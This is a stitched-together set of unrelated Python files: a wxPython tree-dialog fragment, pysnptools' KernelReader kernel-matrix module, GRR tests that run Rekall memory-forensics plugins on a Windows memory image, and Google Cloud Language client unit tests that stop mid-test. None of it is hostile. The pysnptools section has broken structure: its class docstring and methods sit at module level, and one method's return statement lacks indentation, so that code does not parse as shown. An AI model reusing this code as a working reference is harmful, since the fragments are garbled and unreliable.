        self.Bind(wx.EVT_MENU, self.InsertGrid, insert_grid)
        if self.GetSelection().IsOk():
            text = self.GetItemText(self.GetSelection())
            if text.find("THIS GRID") == -1:
                delete_grid = menu.Append(wx.ID_ANY, "Delete grid")
                self.Bind(wx.EVT_MENU, self.DeleteGrid, delete_grid)
        menu.AppendSeparator()
        update_grids = menu.Append(wx.ID_ANY, "Update grids")
        self.Bind(wx.EVT_MENU, self.UpdateGrids, update_grids)
        if self.GetSelection().IsOk():
            text = self.GetItemText(self.GetSelection())
            if text.find("|") != -1 or text.find("THIS GRID") != -1:
                menu.AppendSeparator()
                change_color = menu.Append(wx.ID_ANY, "Change color")
                change_speed = menu.Append(wx.ID_ANY, "Change speed")
                self.Bind(wx.EVT_MENU, self.ChangeRandomColor, change_color)
                self.Bind(wx.EVT_MENU, self.ChangeSpeed, change_speed)
        self.PopupMenu(menu)
        menu.Destroy()
        event.Skip()
@add_metaclass(Singleton)
class GridTreeCtrl(wx.Dialog):
    """Class to manage tree view of imported grids

    Singleton dialog hosting a MyTreeCtrl; a thin facade that forwards
    update/notebook/selection calls to the tree.
    """

    def __init__(self, parent):
        super(GridTreeCtrl, self).__init__(parent, title="Links Manager",
                                           size=(400, 250), style=wx.CAPTION | wx.STAY_ON_TOP)
        self.__parent = parent
        self._tree = MyTreeCtrl(self, wx.ID_ANY, wx.DefaultPosition, (400, 250),
                                wx.TR_DEFAULT_STYLE
                                | wx.TR_LINES_AT_ROOT
                                | wx.TR_FULL_ROW_HIGHLIGHT
                                | wx.TR_SINGLE
                                | wx.TR_HIDE_ROOT
                                # wx.TR_HAS_BUTTONS
                                #| wx.TR_EDIT_LABELS
                                #| wx.TR_MULTIPLE
                                #| wx.TR_HIDE_ROOT
                                )
        s = wx.BoxSizer()
        s.Add(self._tree, 0, wx.EXPAND | wx.ALL)
        # NOTE(review): the sizer is never attached via self.SetSizer(s);
        # layout appears to rely on the fixed (400, 250) tree size instead
        # -- confirm intent.

    def UpdateTree(self):
        """Update the tree view
        """
        self._tree.UpdateTree()

    def SetNotebook(self, notebook):
        """Set the notebook for the tree
        """
        self._tree.set_notebook(notebook)

    def del_selection(self):
        # Forward: clear link highlighting.
        self._tree.del_selection()

    def init_selection(self):
        # Forward: re-apply the remembered selection.
        self._tree.init_selection()
| |
import numpy as np
import subprocess, sys
import os.path
from itertools import *
import pandas as pd
import logging
import time
import pysnptools.util as pstutil
from pysnptools.pstreader import PstReader
from pysnptools.kernelstandardizer import DiagKtoN
class KernelReader(PstReader):
"""A KernelReader is one of three things:
* A class such as :class:`KernelNpz` for you to specify data in a file. For example,
>>> from pysnptools.kernelreader import KernelNpz
>>>
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> print(kernel_on_disk) # prints specification for reading from file
KernelNpz('../examples/toydata.kernel.npz')
>>> kernel_on_disk.iid_count # prints the number of iids (but doesn't read any kernel values)
500
* A :class:`.KernelData` class that holds kernel data in memory, typically after computing from a SnpReader or reading it from a KernelReader:
>>> # Compute kernel from a SnpReader
>>> from pysnptools.snpreader import Bed
>>> from pysnptools.standardizer import Unit
>>> snp_on_disk = Bed('../../tests/datasets/all_chr.maf0.001.N300',count_A1=False)
>>> kerneldata1 = snp_on_disk.read_kernel(Unit()) #reads the SNP values and computes the kernel
>>> type(kerneldata1.val).__name__ # The val property is an ndarray of kernel values
'ndarray'
>>> print(kerneldata1) # prints the specification of the in-memory kernel information
KernelData(SnpKernel(Bed('../../tests/datasets/all_chr.maf0.001.N300',count_A1=False),standardizer=Unit()))
>>> kerneldata1.iid_count #prints the number of iids (number of individuals) in this in-memory data
300
>>> # Read kernel from a KernelReader
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> kerneldata2 = kernel_on_disk.read() #reads the kernel values
>>> print(kerneldata2) # prints the specification of the in-memory kernel information
KernelData(KernelNpz('../examples/toydata.kernel.npz'))
>>> kerneldata2.iid_count #prints the number of iids (number of individuals) in this in-memory data
500
* A subset of any KernelReader, specified with "[ *iid_index* ]" (or specified with "[ *iid0_index* , *iid1_index* ]"), to read only some kernel values. It can
also be used to re-order the values.
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> subset_on_disk1 = kernel_on_disk[[3,4]] # specification for a subset of the data on disk. No kernel values are read yet.
>>> print(subset_on_disk1.iid_count) # prints the number of iids in this subset (but still doesn't read any kernel values)
2
>>> print(subset_on_disk1) #prints a specification of 'subset_on_disk1'
KernelNpz('../examples/toydata.kernel.npz')[[3,4],[3,4]]
>>> kerneldata_subset = subset_on_disk1.read() # efficiently (if possible) reads the specified subset of values from the disk
>>> print(kerneldata_subset) # prints the specification of the in-memory kernel information
KernelData(KernelNpz('../examples/toydata.kernel.npz')[[3,4],[3,4]])
>>> print((int(kerneldata_subset.val.shape[0]), int(kerneldata_subset.val.shape[1]))) # The dimensions of the ndarray of kernel values
(2, 2)
>>> subset_on_disk2 = kernel_on_disk[[3,4],::2] # specification for a subset of the data on disk. No kernel values are read yet.
>>> print((subset_on_disk2.iid0_count, subset_on_disk2.iid1_count))
(2, 250)
The KernelReaders Classes
================================== ================== ====================== ================== ====================
*Class* *Format* *Random Access* *Suffixes* *Write* method?
:class:`.KernelData` in-memory Yes *n/a* *n/a*
:class:`.KernelNpz` binary No .kernel.npz Yes
:class:`.KernelHdf5` binary Yes .kernel.hdf5 Yes
:class:`.Identity` *n/a* Yes *n/a* No
:class:`.SnpKernel` depends depends *n/a* No
================================== ================== ====================== ================== ====================
Methods & Properties:
Every KernelReader, such as :class:`.KernelNpz` and :class:`.KernelData`, when square has these properties: :attr:`iid`, :attr:`iid_count`,
and these methods: :meth:`read`, and :meth:`iid_to_index`. A square kernel is one that has the same iid list for both its rows and columns.
More generally, KernelReaders can have one iid list for its rows and a different iid list for its columns, so these properties and methods are also defined: :attr:`iid0`, :attr:`iid1`, :attr:`iid0_count`,
:attr:`iid1_count`, :meth:`iid0_to_index`, and :meth:`iid1_to_index`.
See below for details.
:class:`.KernelData` is a KernelReader so it supports the above properties and methods. In addition, it supports property :attr:`.KernelData.val`, method :meth:`.KernelData.standardize`, and equality testing.
See below for details.
Some of the classes, such as :class:`.KernelNpz`, also provide a static :meth:`KernelNpz.write` method for writing :class:`.KernelData`.
>>> # create a kernel from a Bed file and write to KernelNpz format
>>> from pysnptools.snpreader import Bed
>>> from pysnptools.standardizer import Unit
>>> import pysnptools.util as pstutil
>>> from pysnptools.util import print2 # Makes ascii strings look the same under Python2/Python3
>>> kerneldata = Bed('../examples/toydata.bed',count_A1=False).read_kernel(Unit()) # Create a kernel from the data in the Bed file
>>> pstutil.create_directory_if_necessary("tempdir/toydata.kernel.npz")
>>> KernelNpz.write("tempdir/toydata.kernel.npz",kerneldata) # Write data in KernelNpz format
iids:
Individuals are identified with an iid, which is a ndarray of two strings: a family ID and a case ID. For example:
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> print2(kernel_on_disk.iid[:3]) # print the first three iids
[['per0' 'per0']
['per1' 'per1']
['per2' 'per2']]
>>> print(kernel_on_disk.iid_to_index([[b'per2',b'per2'],[b'per1',b'per1']])) #Find the indexes for two iids.
[2 1]
:class:`.KernelReader` is a kind of :class:`.PstReader`. See the documentation for :class:`.PstReader` to learn about:
* When Data is Read
* When Data is Re-Read and Copied
* Avoiding Unwanted ndarray Allocations
* Creating Subsetting PstReaders with Indexing
The :meth:`read` Method
By default the :meth:`read` returns a ndarray of scipy.float64 laid out in memory in F-contiguous order (iid0-index varies the fastest). You may, instead,
ask for scipy.float32 or for C-contiguous order or any order. See :meth:`read` for details.
The :meth:`.KernelData.standardize` Method
The :meth:`.KernelData.standardize` method, available only on :class:`.KernelData`, does in-place standardization of the in-memory
kernel data. The method multiplies the values with a scalar factor such that the diagonal sums to iid_count. Although it works in place, for convenience
it also returns itself. See :meth:`.KernelData.standardize` for details.
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> kerneldata1 = kernel_on_disk.read() # read all kernel values into memory
>>> print(np.diag(kerneldata1.val).sum())
5000000.0
>>> kerneldata1.standardize() # standardize changes the values in kerneldata1.val
KernelData(KernelNpz('../examples/toydata.kernel.npz'))
>>> print(np.diag(kerneldata1.val).sum())
500.0
>>> kerneldata2 = kernel_on_disk.read().standardize() # Read and standardize in one expression with only one ndarray allocated.
>>> print(np.diag(kerneldata2.val).sum())
500.0
Details of Methods & Properties:
"""
def __init__(self, *args, **kwargs):
    """Forward all construction arguments to the PstReader base class."""
    super(KernelReader, self).__init__(*args, **kwargs)
@property
def iid(self):
    """A ndarray of the iids. Each iid is a ndarray of two strings (a family ID and a case ID) that identifies an individual.
    Assumes the kernel is square, so will throw an exception if the row iids are different from the column iids.

    :rtype: ndarray (length :attr:`.iid_count`) of ndarray (length 2) of strings

    This property (to the degree practical) reads only iid and sid data from the disk, not kernel value data. Moreover, the iid data is read from file only once.

    :Example:

    >>> from pysnptools.kernelreader import KernelNpz
    >>> from pysnptools.util import print2 # Makes ascii strings look the same under Python2/Python3
    >>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
    >>> print2(kernel_on_disk.iid[:3]) # print the first three iids
    [['per0' 'per0']
     ['per1' 'per1']
     ['per2' 'per2']]
    """
    # Identity (not equality) check: the row and column iid arrays must be
    # the very same object for the kernel to count as square.
    assert self.iid0 is self.iid1, "When 'iid' is used, iid0 must be the same as iid1"
    return self.iid0
@property
def iid0(self):
    """
    A ndarray of the row iids. See :attr:`.iid`
    """
    # The PstReader row axis holds the first iid dimension.
    return self.row
@property
def iid1(self):
    """
    A ndarray of the column iids. See :attr:`.iid`
    """
    # The PstReader col axis holds the second iid dimension.
    return self.col
@property
def iid_count(self):
    """number of iids

    Assumes the kernel is square, so will throw an exception if the row iids are different from the column iids.

    :rtype: integer

    This property (to the degree practical) reads only iid data from the disk, not kernel value data. Moreover, the iid data is read from file only once.
    """
    # Square kernel required: both axes must share the same iid object.
    assert self.iid0 is self.iid1, "When 'iid_count' is used, iid0 must be the same as iid1"
    return self.iid0_count
@property
def iid0_count(self):
    """number of row iids. See :attr:`iid_count`

    :rtype: integer
    """
    # Delegates to the PstReader row axis.
    return self.row_count
@property
def iid1_count(self):
    """number of column iids. See :attr:`iid_count`

    :rtype: integer
    """
    # Delegates to the PstReader col axis.
    return self.col_count
@property
def row_property(self):
    """
    Defined for compatibility with :class:`.PstReader`. Will always be empty.
    """
    # Lazily create and cache an empty (row_count x 0) property array.
    try:
        return self._row_property
    except AttributeError:
        self._row_property = np.empty((self.row_count, 0))
        return self._row_property
@property
def col_property(self):
    """
    Defined for compatibility with :class:`.PstReader`. Will always be empty.
    """
    # Lazily create and cache an empty (col_count x 0) property array.
    try:
        return self._col_property
    except AttributeError:
        self._col_property = np.empty((self.col_count, 0))
        return self._col_property
#!!check that views always return contiguous memory by default
def read(self, order='F', dtype=np.float64, force_python_only=False, view_ok=False):
    """Reads the kernel values and returns a :class:`.KernelData` (with :attr:`.KernelData.val` property containing a new ndarray of the kernel values).

    :param order: {'F' (default), 'C', 'A'}, optional -- Specify the order of the ndarray. If order is 'F' (default),
        then the array will be in F-contiguous order (iid0-index varies the fastest).
        If order is 'C', then the returned array will be in C-contiguous order (iid1-index varies the fastest).
        If order is 'A', then the :attr:`.KernelData.val`
        ndarray may be in any order (either C-, Fortran-contiguous, or even discontiguous).
    :type order: string or None

    :param dtype: {scipy.float64 (default), scipy.float32}, optional -- The data-type for the :attr:`.KernelData.val` ndarray.
    :type dtype: data-type

    :param force_python_only: optional -- If False (default), may use outside library code. If True, requests that the read
        be done without outside library code.
    :type force_python_only: bool

    :param view_ok: optional -- If False (default), allocates new memory for the :attr:`.KernelData.val`'s ndarray. If True,
        if practical and reading from a :class:`KernelData`, will return a new
        :class:`KernelData` with a ndarray shares memory with the original :class:`KernelData`.
        Typically, you'll also wish to use "order='A'" to increase the chance that sharing will be possible.
        Use these parameters with care because any change to either ndarray (for example, via :meth:`.KernelData.standardize`) will effect
        the others. Also keep in mind that :meth:`read` relies on ndarray's mechanisms to decide whether to actually
        share memory and so it may ignore your suggestion and allocate a new ndarray anyway.
    :type view_ok: bool

    :rtype: :class:`.KernelData`

    Calling the method again causes the kernel values to be re-read and creates a new in-memory :class:`.KernelData` with a new ndarray of kernel values.

    If you request the values for only a subset of the sids or iids, (to the degree practical) only that subset will be read from disk.

    :Example:

    >>> from pysnptools.kernelreader import KernelNpz
    >>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
    >>> kerneldata1 = kernel_on_disk.read() # Read all the kernel data returning a KernelData instance
    >>> print(type(kerneldata1.val).__name__) # The KernelData instance contains a ndarray of the data.
    ndarray
    >>> subset_kerneldata = kernel_on_disk[::2].read() # From the disk, read kernel values for every other iid
    >>> print('{0:.6f}'.format(subset_kerneldata.val[0,0])) # Print the first kernel value in the subset
    9923.069928
    >>> subsub_kerneldata = subset_kerneldata[:10].read(order='A',view_ok=True) # Create an in-memory subset of the subset with kernel values for the first ten iids. Share memory if practical.
    >>> import numpy as np
    >>> #print(np.may_share_memory(subset_kerneldata.val, subsub_kerneldata.val)) # Do the two ndarray's share memory? They could. Currently they won't.
    """
    # _read with (None, None) selectors reads the full (sub)matrix; the
    # concrete subclass decides how to honor order/dtype/view_ok.
    val = self._read(None, None, order, dtype, force_python_only, view_ok)
    from pysnptools.kernelreader import KernelData
    ret = KernelData(iid0=self.iid0, iid1=self.iid1, val=val, name=str(self))
    return ret
def iid_to_index(self, list):
    """Convert a list of iids into their index numbers.

    The kernel must be square: the row iids (iid0) must be the very same
    object as the column iids (iid1), otherwise an AssertionError is raised.

    :param list: list of iids
    :type list: list of list of strings

    :rtype: ndarray of int

    This method (to the degree practical) reads only iid from the disk, not kernel value data. Moreover, the iid data is read from file only once.

    :Example:

    >>> from pysnptools.kernelreader import KernelNpz
    >>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
    >>> print(kernel_on_disk.iid_to_index([[b'per2',b'per2'],[b'per1',b'per1']])) #Find the indexes for two iids.
    [2 1]
    """
    assert self.iid0 is self.iid1, "When 'iid_to_index' is used, iid0 must be the same as iid1"
    indexes = self.iid0_to_index(list)
    return indexes
def iid0_to_index(self, list):
    """Map a list of row iids to their row index numbers. See :attr:`iid_to_index`."""
    return self.row_to_index(list)
@staticmethod
def _makekey(item):
return tuple(i.encode('ascii') for i in item)
def iid1_to_index(self, list):
    """Map a list of column iids to their column index numbers. See :attr:`iid_to_index`."""
    return self.col_to_index(list)
def __getitem__(self, iid_indexer_and_snp_indexer):
    """Return a lazy subset view of this kernel.

    A tuple argument is unpacked as ``(row indexer, column indexer)``; any
    other argument is applied to both the rows and the columns.
    """
    from pysnptools.kernelreader._subset import _KernelSubset
    indexer = iid_indexer_and_snp_indexer
    if isinstance(indexer, tuple):
        row_indexer, col_indexer = indexer
    else:
        row_indexer = col_indexer = indexer
    return _KernelSubset(self, row_indexer, col_indexer)
def _assert_iid0_iid1(self):
    """Validate that both iid arrays are 2-D string arrays whose rows are (family id, individual id) pairs.

    NOTE(review): ``np.string_`` exists only in numpy < 2.0 — confirm the pinned numpy version.
    """
    row, col = self._row, self._col
    assert row.dtype.type is np.string_ and len(row.shape) == 2 and row.shape[1] == 2, "iid0 should be dtype S, have two dimensions, and the second dimension should be size 2"
    assert col.dtype.type is np.string_ and len(col.shape) == 2 and col.shape[1] == 2, "iid1 should be dtype S, have two dimensions, and the second dimension should be size 2"
def _read_with_standardizing(self, to_kerneldata, snp_standardizer=None, kernel_standardizer=DiagKtoN(), return_trained=False):
    """Read the kernel into memory and apply *kernel_standardizer* to it.

    For plain (non-SnpKernel) readers there is no SNP standardization step,
    so *to_kerneldata* must be truthy and the trained SNP standardizer slot
    in the returned triple is always None.
    """
    assert to_kerneldata, "When working with non-SnpKernels, to_kerneldata must be 'True'"
    kernel, kernel_trained = self.read().standardize(kernel_standardizer, return_trained=True)
    if not return_trained:
        return kernel
    return kernel, None, kernel_trained
if __name__ == "__main__":
    # When run directly, execute this module's doctest examples.
    logging.basicConfig(level=logging.INFO)

    import doctest
    doctest.testmod()
    # There is also a unit test case in 'pysnptools\test.py' that calls this doc test
    print("done")
| |
#!/usr/bin/env python
"""Tests for grr.client.client_actions.grr_rekall."""
import functools
import os
import logging
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import test_lib
# This test runs flows from these modules. pylint: disable=unused-import
from grr.lib.flows.general import memory
from grr.lib.flows.general import registry
from grr.lib.flows.general import transfer
# pylint: enable=unused-import
from grr.lib.rdfvalues import paths as rdf_paths
from grr.lib.rdfvalues import rekall_types as rdf_rekall_types
class RekallTestSuite(test_lib.EmptyActionTest):
  """A test suite for testing Rekall plugins.

  Note that since the Rekall plugin is a SuspendableAction it is impossible to
  test it in isolation from the AnalyzeClientMemory Flow. The flow is needed to
  load profiles, and allow the client action to proceed. We therefore have flow
  tests here instead of simply a client action test (Most other client actions
  are very simple so it is possible to test them in isolation).
  """

  def setUp(self):
    super(RekallTestSuite, self).setUp()
    # One fake client is enough; every flow in this suite targets it.
    self.client_id = self.SetupClients(1)[0]

  def CreateClient(self):
    """Create a fake Windows 7 AMD64 client object in AFF4."""
    # The architecture/OS attributes drive which Rekall profiles get loaded.
    client = aff4.FACTORY.Create(self.client_id,
                                 "VFSGRRClient", token=self.token)
    client.Set(client.Schema.ARCH("AMD64"))
    client.Set(client.Schema.OS_RELEASE("7"))
    client.Set(client.Schema.SYSTEM("Windows"))
    client.Close()

  def LaunchRekallPlugin(self, request):
    """Launch AnalyzeClientMemory flow and return its output as a string.

    Args:
      request: A RekallRequest() proto.
    """
    # For this test we force the client to write the profile cache in the temp
    # directory. This forces the profiles to always be downloaded from the
    # server (since each test run gets a new temp directory).
    with test_lib.ConfigOverrider({"Client.rekall_profile_cache_path":
                                   self.temp_dir}):
      image_path = os.path.join(self.base_path, "win7_trial_64bit.raw")
      self.CreateClient()
      self.CreateSignedDriver()

      class ClientMock(action_mocks.MemoryClientMock):
        """A mock which returns the image as the driver path."""

        def GetMemoryInformation(self, _):
          """Mock out the driver loading code to pass the memory image."""
          reply = rdf_rekall_types.MemoryInformation(
              device=rdf_paths.PathSpec(
                  path=image_path,
                  pathtype=rdf_paths.PathSpec.PathType.OS))
          reply.runs.Append(offset=0, length=1000000000)
          return [reply]

      # Allow the real RekallAction to run against the image.
      for _ in test_lib.TestFlowHelper(
          "AnalyzeClientMemory",
          ClientMock(
              "RekallAction", "WriteRekallProfile", "DeleteGRRTempFiles"
          ),
          token=self.token, client_id=self.client_id,
          request=request, output="analysis/memory"):
        pass

      # Check that the profiles are also cached locally.
      test_profile_dir = os.path.join(config_lib.CONFIG["Test.data_dir"],
                                      "profiles")
      self.assertEqual(
          os.stat(os.path.join(self.temp_dir, "v1.0/pe.gz")).st_size,
          os.stat(os.path.join(test_profile_dir, "v1.0/pe.gz")).st_size)

      p_name = "v1.0/nt/GUID/F8E2A8B5C9B74BF4A6E4A48F180099942.gz"
      self.assertEqual(
          os.stat(os.path.join(self.temp_dir, p_name)).st_size,
          os.stat(os.path.join(test_profile_dir, p_name)).st_size)
def RequireTestImage(f):
  """Decorator that skips tests if we don't have the memory image.

  Args:
    f: the test method to wrap.

  Returns:
    A wrapper that runs *f* when win7_trial_64bit.raw is readable next to
    the test data, and skips the test otherwise.
  """

  @functools.wraps(f)
  def Decorator(testinstance):
    image_path = os.path.join(testinstance.base_path, "win7_trial_64bit.raw")
    if os.access(image_path, os.R_OK):
      return f(testinstance)
    else:
      # BUG FIX: the original adjacent string literals concatenated to
      # "memory image,skipping test" (missing space after the comma).
      return testinstance.skipTest("No win7_trial_64bit.raw memory image, "
                                   "skipping test. Download it here: "
                                   "goo.gl/19AJGl and put it in test_data.")

  return Decorator
class RekallTests(RekallTestSuite):
  """Test some core Rekall modules."""

  @RequireTestImage
  def testRekallModules(self):
    """Tests the end to end Rekall memory analysis."""
    request = rdf_rekall_types.RekallRequest()
    request.plugins = [
        # Only use these methods for listing processes.
        rdf_rekall_types.PluginRequest(
            plugin="pslist", args=dict(
                method=["PsActiveProcessHead", "CSRSS"]
            )),
        rdf_rekall_types.PluginRequest(plugin="modules")]
    self.LaunchRekallPlugin(request)

    # Get the result collection - it should be a RekallResponseCollection.
    fd = aff4.FACTORY.Open(self.client_id.Add("analysis/memory"),
                           token=self.token)

    # Ensure that the client_id is set on each message. This helps us demux
    # messages from different clients, when analyzing the collection from a
    # hunt.
    json_blobs = []
    for x in fd:
      self.assertEqual(x.client_urn, self.client_id)
      json_blobs.append(x.json_messages)
    json_blobs = "".join(json_blobs)

    # DumpIt was running when the test image was acquired, so both its
    # executable and its driver must appear in the pslist/modules output.
    for knownresult in ["DumpIt.exe", "DumpIt.sys"]:
      self.assertTrue(knownresult in json_blobs)

  @RequireTestImage
  def testFileOutput(self):
    """Tests that a file can be written by a plugin and retrieved."""
    request = rdf_rekall_types.RekallRequest()
    request.plugins = [
        # Run procdump to create one file.
        rdf_rekall_types.PluginRequest(
            plugin="procdump", args=dict(pid=2860))]

    with test_lib.Instrument(transfer.MultiGetFile,
                             "StoreStat") as storestat_instrument:
      self.LaunchRekallPlugin(request)
      # Expect one file to be downloaded.
      self.assertEqual(storestat_instrument.call_count, 1)

  @RequireTestImage
  def testParameters(self):
    """Plugin arguments (pid list, method) are honoured end to end."""
    request = rdf_rekall_types.RekallRequest()
    request.plugins = [
        # Only use these methods for listing processes.
        rdf_rekall_types.PluginRequest(
            plugin="pslist", args=dict(
                pid=[4, 2860],
                method="PsActiveProcessHead"
            )),
    ]

    self.LaunchRekallPlugin(request)

    # Get the result collection - it should be a RekallResponseCollection.
    fd = aff4.FACTORY.Open(self.client_id.Add("analysis/memory"),
                           token=self.token)

    json_blobs = [x.json_messages for x in fd]
    json_blobs = "".join(json_blobs)
    # pid 4 is the System process; 2860 is DumpIt.exe in this image.
    for knownresult in ["System", "DumpIt.exe"]:
      self.assertTrue(knownresult in json_blobs)

  @RequireTestImage
  def testDLLList(self):
    """Tests that we can run a simple DLLList Action."""
    request = rdf_rekall_types.RekallRequest()
    request.plugins = [
        # Only use these methods for listing processes.
        rdf_rekall_types.PluginRequest(
            plugin="dlllist", args=dict(
                proc_regex="dumpit",
                method="PsActiveProcessHead"
            )),
    ]

    self.LaunchRekallPlugin(request)

    # Get the result collection - it should be a RekallResponseCollection.
    fd = aff4.FACTORY.Open(self.client_id.Add("analysis/memory"),
                           token=self.token)

    json_blobs = [x.json_messages for x in fd]
    json_blobs = "".join(json_blobs)
    # DumpIt is a WOW64 process, so the usual WOW64 support DLLs must show up.
    for knownresult in ["DumpIt", "wow64win", "wow64", "wow64cpu", "ntdll"]:
      self.assertTrue(knownresult in json_blobs)

  @RequireTestImage
  def DisabledTestAllPlugins(self):
    """Tests that we can run a wide variety of plugins.

    Some of those plugins are very expensive to run so this test is disabled by
    default.
    """
    plugins = [
        "atoms", "atomscan", "build_index", "callbacks", "cc", "cert_vad_scan",
        "certscan", "cmdscan", "consoles", "convert_profile", "desktops",
        "devicetree", "dis", "dlldump", "dlllist", "driverirp", "driverscan",
        "dt", "dtbscan", "dtbscan2", "dump", "dwarfparser", "eifconfig",
        "enetstat", "eventhooks", "fetch_pdb", "filescan", "find_dtb", "gahti",
        "getservicesids", "grep", "guess_guid", "handles", "hivedump", "hives",
        "imagecopy", "imageinfo", "impscan", "info", "json_render", "kdbgscan",
        "kpcr", "l", "ldrmodules", "load_as", "load_plugin", "malfind",
        "memdump", "memmap", "messagehooks", "moddump", "modscan", "modules",
        "mutantscan", "netscan", "netstat", "notebook", "null", "object_tree",
        "object_types", "p", "parse_pdb", "pas2vas", "pedump", "peinfo", "pfn",
        "phys_map", "pool_tracker", "pools", "printkey", "procdump", "procinfo",
        "pslist", "psscan", "pstree", "psxview", "pte", "ptov", "raw2dmp",
        "regdump", "rekal", "sessions", "ssdt", "svcscan", "symlinkscan",
        "thrdscan", "threads", "timers", "tokens", "unloaded_modules",
        "userassist", "userhandles", "users", "vad", "vaddump", "vadinfo",
        "vadtree", "vadwalk", "version_modules", "version_scan", "vmscan",
        "vtop", "windows_stations"]

    output_urn = self.client_id.Add("analysis/memory")
    failed_plugins = []

    # Run every plugin in isolation, collecting (not raising on) failures so
    # a single broken plugin does not hide the rest.
    for plugin in plugins:
      logging.info("Running plugin: %s", plugin)
      try:
        aff4.FACTORY.Delete(output_urn, token=self.token)

        request = rdf_rekall_types.RekallRequest()
        request.plugins = [
            rdf_rekall_types.PluginRequest(plugin=plugin)
        ]
        self.LaunchRekallPlugin(request)

        # Get the result collection - it should be a RekallResponseCollection.
        fd = aff4.FACTORY.Open(output_urn, token=self.token)

        # Try to render the result.
        fd.RenderAsText()
      except Exception:  # pylint: disable=broad-except
        failed_plugins.append(plugin)
        logging.error("Plugin %s failed.", plugin)

    if failed_plugins:
      self.fail("Some plugins failed: %s" % failed_plugins)
def main(argv):
  """Entry point: delegate to the GRR test runner."""
  test_lib.main(argv)


if __name__ == "__main__":
  flags.StartMain(main)
| |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import mock
import pytest
from google.cloud import language_v1beta2
from google.cloud.language_v1beta2.proto import language_service_pb2
class MultiCallableStub(object):
    """Stub for the grpc.UnaryUnaryMultiCallable interface.

    Records every request on the owning channel stub and replays the channel
    stub's canned responses, re-raising any canned response that is an
    Exception instance.
    """

    def __init__(self, method, channel_stub):
        self.method = method
        self.channel_stub = channel_stub

    def __call__(self, request, timeout=None, metadata=None, credentials=None):
        # Remember the call so tests can assert on what was sent.
        self.channel_stub.requests.append((self.method, request))

        queued = self.channel_stub.responses
        response = queued.pop() if queued else None

        if isinstance(response, Exception):
            raise response

        if response:
            return response
class ChannelStub(object):
    """Stub for the grpc.Channel interface.

    :param responses: canned responses handed out (LIFO) to calls made
        through this channel's multi-callables; a fresh empty list is used
        when omitted.
    """

    def __init__(self, responses=None):
        # BUG FIX: the original used a mutable default argument
        # (``responses=[]``), so every ChannelStub created without an explicit
        # list shared — and mutated — the same response queue.
        self.responses = [] if responses is None else responses
        self.requests = []

    def unary_unary(self, method, request_serializer=None, response_deserializer=None):
        """Return a stub callable that records requests against this channel."""
        return MultiCallableStub(method, self)
class CustomException(Exception):
    """Sentinel exception queued as a canned response to exercise the clients' error paths."""
    pass
class TestLanguageServiceClient(object):
    """Unit tests for LanguageServiceClient.

    Each test patches gRPC channel creation so the client talks to an
    in-memory ChannelStub, then asserts on the request sent and on the
    response (or exception) received.
    """

    def test_analyze_sentiment(self):
        """analyze_sentiment returns the canned response and sends exactly one request."""
        # Setup Expected Response
        language = "language-1613589672"
        expected_response = {"language": language}
        expected_response = language_service_pb2.AnalyzeSentimentResponse(
            **expected_response
        )

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup Request
        document = {}

        response = client.analyze_sentiment(document)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = language_service_pb2.AnalyzeSentimentRequest(
            document=document
        )
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_analyze_sentiment_exception(self):
        """analyze_sentiment propagates transport-level errors to the caller."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup request
        document = {}

        with pytest.raises(CustomException):
            client.analyze_sentiment(document)

    def test_analyze_entities(self):
        """analyze_entities returns the canned response and sends exactly one request."""
        # Setup Expected Response
        language = "language-1613589672"
        expected_response = {"language": language}
        expected_response = language_service_pb2.AnalyzeEntitiesResponse(
            **expected_response
        )

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup Request
        document = {}

        response = client.analyze_entities(document)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = language_service_pb2.AnalyzeEntitiesRequest(
            document=document
        )
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_analyze_entities_exception(self):
        """analyze_entities propagates transport-level errors to the caller."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup request
        document = {}

        with pytest.raises(CustomException):
            client.analyze_entities(document)

    def test_analyze_entity_sentiment(self):
        """analyze_entity_sentiment returns the canned response and sends exactly one request."""
        # Setup Expected Response
        language = "language-1613589672"
        expected_response = {"language": language}
        expected_response = language_service_pb2.AnalyzeEntitySentimentResponse(
            **expected_response
        )

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        patch = mock.patch("google.api_core.grpc_helpers.create_channel")
        with patch as create_channel:
            create_channel.return_value = channel
            client = language_v1beta2.LanguageServiceClient()

        # Setup Request
        document = {}

        response = client.analyze_entity_sentiment(document)
        assert expected_response == response

        assert len(channel.requests) == 1
